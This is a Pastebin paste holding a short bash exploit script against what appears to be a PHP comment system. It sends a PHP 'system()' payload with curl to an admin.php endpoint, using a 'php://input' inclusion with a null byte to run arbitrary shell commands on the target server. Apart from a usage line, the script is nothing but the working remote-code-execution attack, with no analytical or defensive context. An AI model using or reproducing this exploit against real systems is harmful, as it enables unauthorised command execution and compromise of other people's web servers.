UY-Scuti

Untitled

Jun 19th, 2019
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3.  
  4. HOST=$1
  5. CMD=$2
  6. if [[ $# -eq 0 ]];
  7. then
  8. echo "Usage: ./$0 <host to spoof> <cmd>"
  9. exit
  10. fi
  11. curl -s --data "<?system('$CMD');?>" 'http://${HOST}/internal/advanced_comment_system/admin.php?ACS_path=php://input%00'
  12. echo
  13. echo
Advertisement
Add Comment
Please, Sign In to add comment